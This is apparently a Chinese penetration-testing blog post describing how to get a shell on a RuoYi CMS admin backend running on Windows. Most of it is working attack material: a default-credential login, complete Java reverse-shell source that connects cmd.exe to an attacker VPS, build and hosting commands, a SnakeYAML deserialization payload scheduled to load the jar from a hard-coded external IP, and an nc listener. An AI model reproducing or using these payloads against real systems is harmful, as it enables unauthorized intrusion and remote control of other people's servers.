windows下若依CMS后台getshell

发表于 2023-12-25 分类于渗透

利用

默认账号密码：admin admin123登入后台，下载yaml反序列化exp，artsploit/yaml-payload

由于这个站是windows，稍微修改一下 AwesomeScriptEngineFactory.java

package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() throws java.io.IOException, InterruptedException {
        try {

            String host="xxx";  //vps ip
            int port=9000;  //vps port
            String cmd="cmd.exe";
            Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
            java.net.Socket s=new java.net.Socket(host,port);
            java.io.InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
            java.io.OutputStream po=p.getOutputStream(),so=s.getOutputStream();
            while(!s.isClosed()) {
                while(pi.available()>0) {
                    so.write(pi.read());
                }
                while(pe.available()>0) {
                    so.write(pe.read());
                }
                while(si.available()>0) {
                    po.write(si.read());
                }
                so.flush();
                po.flush();
                Thread.sleep(50);
                try {
                    p.exitValue();
                    break;
                }
                catch (Exception e){
                }
            };
            p.destroy();
            s.close();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public String getEngineName() {
        return null;
    }

    @Override
    public String getEngineVersion() {
        return null;
    }

    @Override
    public List<String> getExtensions() {
        return null;
    }

    @Override
    public List<String> getMimeTypes() {
        return null;
    }

    @Override
    public List<String> getNames() {
        return null;
    }

    @Override
    public String getLanguageName() {
        return null;
    }

    @Override
    public String getLanguageVersion() {
        return null;
    }

    @Override
    public Object getParameter(String key) {
        return null;
    }

    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) {
        return null;
    }

    @Override
    public String getOutputStatement(String toDisplay) {
        return null;
    }

    @Override
    public String getProgram(String... statements) {
        return null;
    }

    @Override
    public ScriptEngine getScriptEngine() {
        return null;
    }
}

进行编译

javac src/artsploit/AwesomeScriptEngineFactory.java   //会生成一个AwesomeScriptEngineFactory.class文件
jar -cvf yaml-payload.jar -C src/ .		//将src目录下的文件打包为yaml-payload.jar的jar包

然后上传到vps上,并起一个python的web服务

python3 -m http.server

后台添加定时任务，请求vps的jar包

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://1.116.110.61:8000/yaml-payload.jar"]]]]')

vps监听端口

nc -lvvp 9000